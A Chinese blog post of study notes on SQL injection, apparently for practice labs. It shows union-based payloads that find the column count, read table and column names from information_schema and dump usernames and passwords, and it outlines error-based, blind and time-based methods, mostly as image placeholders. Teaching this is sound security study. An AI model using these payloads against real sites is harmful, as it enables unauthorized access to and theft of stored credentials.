sql注入(部分)

最新推荐文章于 2025-04-03 11:53:29 发布
最新推荐文章于 2025-04-03 11:53:29 发布
阅读量959 收藏 19
点赞数 20
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/QT281327/article/details/144010449
版权

闭合方式: ’     ”     ‘)  ”)

注释符号:--+    #     %23

union注入

字符型

1.查找注入点

2.判断数字型还是字符型  

id=1 and 1=1成功

id=1 and 1=2成功

3.判断闭合及注释方式(需要闭合!)

4.查询列(order by    group by(不易被拦截))

id=1' group by 1--+

id=1' group by 2--+

......

5.查询回显位

id=-1' union select 1,2,3--+(与前面的列要保持一致)

id=-1' union select 1,2,database()--+

id=-1' union select 1,version(),3--+

因为页面只能显示一个内容,so为了显示我们真正要查询的数据,将id=后改为0或者负数

 

6.查询表名

4a643f30c6034884a553c8c168ec4842.png

id=-1' union select 1,2 table_name from information_schema_tables where table_schema=database()--+

(其中database()可以替换成上一步查询到的数据库名)

 

7.查询列名

id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

同理database()可以替换,users为刚刚查询到的表名(一定要加单引号!!!)

或者:

id=0 union select 1,(group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users'),3--+

优先执行小括号

8.拿到用户名和密码

id=0 union select 1,group_concat(username,'~',password),3 from users--+

'~'只是为了区分数据,方便查看

 

数字型

1.查找注入点

2.判断数字型还是字符型  1=2   或者  做减法(尽量不用加法)

id=1 and 1=1成功

id=2 and 1=2失败

3.判断注释方式(不需要 闭合!)

4.查询列(order by    group by(不易被防火墙拦截))

id=1 group by 1--+

id=1 group by 2--+

......

5.查询回显位

id=-1 union select 1,2,3--+(与前面的列要保持一致)

id=-1 union select 1,2,database()--+

id=-1 union select 1,version(),3--+

......(除了不用闭合其他与字符型一样)

 

报错注入

url中输对了页面没反应,输错了有报错(所以咱故意输错得到数据)

0f0ee5ca9cff44fa91ef88975856dc9a.png

extractvalue报错注入

cec734c1438843658b630df0abbd327e.png

concat为拼接函数(将后面俩玩意儿拼起来)0x74是ascll编码的“~”

查表名

c26a5039156e466782823c7f9e96b614.png

查列名

21098a8e4fbb4b15a94101c33569402f.png

报错注入只能返回不过32个字符,所以使用substring

634a73e06e7f4e878a2b10aee10e5816.png

substring(12345,3,2)意思是从12345的第3个字符开始向后显示两个字符 得到34。

 

updatexml报错注入

updatexml报错注入与extractvalue非常相似

757a9bb0a1e846f580c44dbcf802dc2b.png

ae6501396b3a4f8a8b039b4969a7754b.png

其他的都差不多

 

floor报错注入

查表名

9d21e3f998ba4d1fba9fb29b80560f71.png

查列名

5a996698db8149b2b786eafaaa7a5015.png

查用户名和密码

b6136f5f6dac45e587c8c7a91277c8d6.png

使用group_concat没显示就用concat

0021c0aa469d4747bd0d0ba78ed06fef.png

rand():随机返回0~1间的小数

floor():小数向下取整

ceiling():小数向上取整

concat_ws():将括号内数据用第一个字段连接起来

group by子句:分组语句

as:别名

count():统计数量

limit:这里用于显示指定行数

 

布尔盲注

无回显无报错

判断闭合方式

669b55a285c7444887791361d8cfab8b.png

查表名

结合ASCLL码表一个字母一个字母地判断

35e239a2f4d9424386432e80020ee31f.png

查列名

结合ASCLL码表一个字母一个字母地判断

f24cc17b14d740b1b8015d22ca31016e.png

查用户名

结合ASCLL码表一个字母一个字母地判断

1a6c670839544359bf1456c504845ad9.png

limit 0,1:从第0行开始,显示1行(从0开始计数)

substr((查询的东西),n,1):从第n个字母开始,显示1个字母(从n开始计数)

 

时间注入

建立在布尔盲注的基础上

闭合符判断

114fbfcdc4714513b9efc553cf966717.png

结合ASCLL码表一个字母一个字母地判断

89acfd825ff94002a293d64cbbef09d1.png

if(a,b,d):如果a成立,则执行b,不成立执行d

3ff12ed5e6b64ef5a95e99f2c99d0beb.png

 

sql注入文件上传

c79dd33b7ff243b597ba12aa7ef35eff.png

8db590e514914f079f702cfcdfbfd6cf.png

 

 

 

 

 

 

Autuuuuumn
关注
SQL注入中对闭合符号的判断
ch4nge
11-23 4769
前言 最近在做sqli目录操作总结:补充: 操作 这里列出一些题目中的查询语句 Less1---单引号 $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; Less2---无符号 $id=$_GET['id']; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; Less3---') $id=$_GET['id']; $sql="SELECT * FROM users
sql注入部分总结和复现
iteuko的博客
08-06 909
一个端口对应一个服务。
sql注入闭合方式
qq_67667368的博客
03-31 2838
由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。MYSQL数据库的包容性比较强,如果你输错了数据的类型,MYSQL数据库会自动将其转换成正确的数据类型,比如输入1)、1"、1-等,只要数字后面的字符不是闭合符的,数据库都会把你输入的错误的数据转换成正确的数据类型。
SQL注入详解
最新发布
TXyyd1的博客
04-03 885
这使得查询条件恒真,可能返回所有用户信息。若页面正常返回大量数据而非报错,就可能存在 SQL 注入漏洞。时,最终 SQL 语句变为。
sql注入闭合方式
quan9i的博客
03-01 3763
文章目录前言错误理解正解 前言 近期在进行sql注入实战时出现了闭合方式不理解,可能是由于长时间未学习,突然再次做题出现了这种问题。对此我将问题总结如下,希望此能解决部分正在学习sql注入的人 错误理解 $sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 此语句中的id首先可以看出是get注入,此时我的想法是'id'是php中
SQL注入 -- GET注入闭合
weixin_52151447的博客
11-15 1573
SQL注入 -- GET注入闭合 GET注入时,传入的参数有时不是不是纯数字,如:id='1' ,id = "1" ,或者id=("1")等等,这时使用传统的get注入时,会发现查不出对应的数据来,因此,在传参时需要先对传入的参数进行闭合,添加SQL语句,在将原来的闭合注释。如:id = '1' order by 3 -- Mr 注:--表示注释 闭合注入方法: 1、判断页面是否存在注入 2、判断字段数 3、找到对应的显错位 4、输出数据库名 5、输出表名 6、输出字段名 7、...
SQL注入闭合方式及万能密码
西电卢本伟的博客
03-24 2772
由万能公式想到的...请求方式GET请求POST请求SQL注入闭合方式数字型字符型再看sqli-labs实验万能密码 请求方式 两种 HTTP 请求方法:GET 和 POST 在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET 和 POST。 ● GET - 从指定的资源请求数据。 ● POST - 向指定的资源提交要被处理的数据 GET请求 个人理解get请求其实就是通过URL来传递数据。 一个标准的URL网址,在最后有一个querystring部分,表示对页面查询,用?来表示这部分,内
XSS和sql注入部分场景测试用例样例
m0_37570494的博客
09-07 927
XSS 攻击通常是通过输入字段插入恶意的 JavaScript 代码,试图执行客户端脚本。设计这些测试用例时,需要涵盖常见的 XSS 攻击手段。SQL 注入攻击通常通过在输入字段中插入恶意 SQL 代码,试图操纵数据库查询。设计这些测试用例时,需要涵盖各种常见的 SQL 注入技术。
SQL 注入天书.pdf
08-06
部分从Background-1基础知识开始,涵盖了SQL注入的基础概念,如SQL语法、查询结构和如何识别易受攻击的点。Less-1至Less-4逐步引导用户了解如何通过构造恶意输入来执行未授权的数据库查询,揭示了SQL注入的基本...
sql注入字典fuzz
01-11
4. **教育与培训**:在网络安全教育和培训过程中,SQL注入字典作为教学资源的一部分,帮助学生了解和掌握SQL注入的基本原理和技术手段。 #### 六、结论 通过对SQL注入字典fuzz的详细解析,我们可以了解到SQL注入...
SQL 注入 SQL注入的原理 如何避免SQL注入
12-12
这种方法可以防止SQL注入,因为数据库会将占位符及其内容视为数据处理,而不是SQL命令的一部分。 3. 安全测试、安全审计:在软件开发的不同阶段进行代码审查和安全扫描,利用自动化工具检测潜在的安全问题,保证代码...
关于sql语句的闭合方式
12-14
关于sql语句的闭合方式 前言 以前一直以为字符型的SQL语句只能用单引号或双引号闭合,数值型可以不用闭合。以为php的SQL语句能用括号闭合是因为PHP的特性。自己的基础实在不行。 准备: 建一张包含数值型和字符型字段的表,并插入数据。 这里有一个在线测试sql语句的网站(http://sqlfiddle.com),含有以下数据库运行环境,很方便。 左边输入框执行建库、表、添加数据等操作,右边执行查询语句,如show、select。 常用闭合方式: 单引号''、双引号""、括号()、括号+单引号('')、多层括号+单引号,例((((((((''))))))))。另外mysql还可以使用括
SQL注入闭合判断
m0_37638874的博客
06-28 2073
SQL注入闭合判断SQL注入闭合类型 SQL注入闭合类型可以分为三种数字型 单引号 双引号而这三种类型都可以SQL注入int型字段查询 像数据库判断字段为的,存在的可以通过以上方式判断闭合类型 然后通过以上方式,判断注:为什么说是int 型呢?这种只适用于前端传值是的,假如查询条件的字符型的,那闭合只能是与了,且,只能一个个去试了我就就可以写个脚本去判断闭合了,这个暂定,以后补充...
SQL注入
青影境空
02-06 400
sql注入
SQL注入判断闭合符—自动化脚本
weixin_48968378的博客
12-07 581
1、先将字典放入与脚本同一目录下,并且安装好python的环境(建议使用python3)。 2、在目录中新建文件cmd.bat: 3、点击文件cmd.bat打开,输入python 文件(**注意在用之前修改好脚本**)。 4、如下是脚本(本实例基于SQLi-lab): import requests import sys url='http://192.168.243.130:8080/Less-8/?id=3%s' flag='You are in' #输入标志位 #判别闭合符 de
一个关于sql注入寻找闭合的python小脚本
Alexz__的博客
09-16 515
头一天开始学python,在w3c上看了整整一天,第二天就开始对着一个成品的脚本尝试着敲了一个小脚本用来跑闭合的,和老师一起发现了几个关于python里urllib.request模块额问题 代码一直就敲的不是很好,勿喷 上源码 import urllib.request url = "" url_bihe = "http://192.168.60.129/sqli-labs-...
SQL注入原理及如何判断闭合
热门推荐
大大大蜜蜂的博客
09-30 1万+
一、SQL注入原理: 造成SQL注入的原因: 在没有对用户的输入进行过滤、检测的情况下,就把用户输入数据,带入到数据库中执行SQL语句。 利用SQL注入: 由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。 访问网页具体流程图: 在上图中,用户访问实验楼主页进行了如下过程: 1、在 Web 浏览器中输入 www.shiya
SQL注入基础--判断闭合形式
weixin_44189363的博客
08-28 8845
这里写自定义目录标题****SQL注入基础--判断闭合形式**## 1.整形闭合2.单引号闭合3.双引号闭合总结 ** SQL注入基础–判断闭合形式 SQL语句的闭合形式大概如下几种: SELECT * FROM `users` WHERE id= 1;#整形闭合 SELECT * FROM `users` WHERE id='1'; #单引号闭合 SELECT * FROM `users` WHERE id="1";#双引号闭合 SELECT * FROM `users` WHERE id=('1');#
网络安全(sql注入2,为什么要构造闭合
m0_74096786的博客
09-10 389
构造闭合的本质原因是为了让我们好注入语句且不报错。
御剑SQL注入工具使用详解
标题中提到的“SQL注入工具-御剑”是一个特定的网络安全工具,其功能是针对SQL注入漏洞进行检测、利用和分析。SQL注入是一种常见的网络攻击技术,攻击者通过在数据库查询中插入恶意SQL代码,以控制或窃取数据库中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值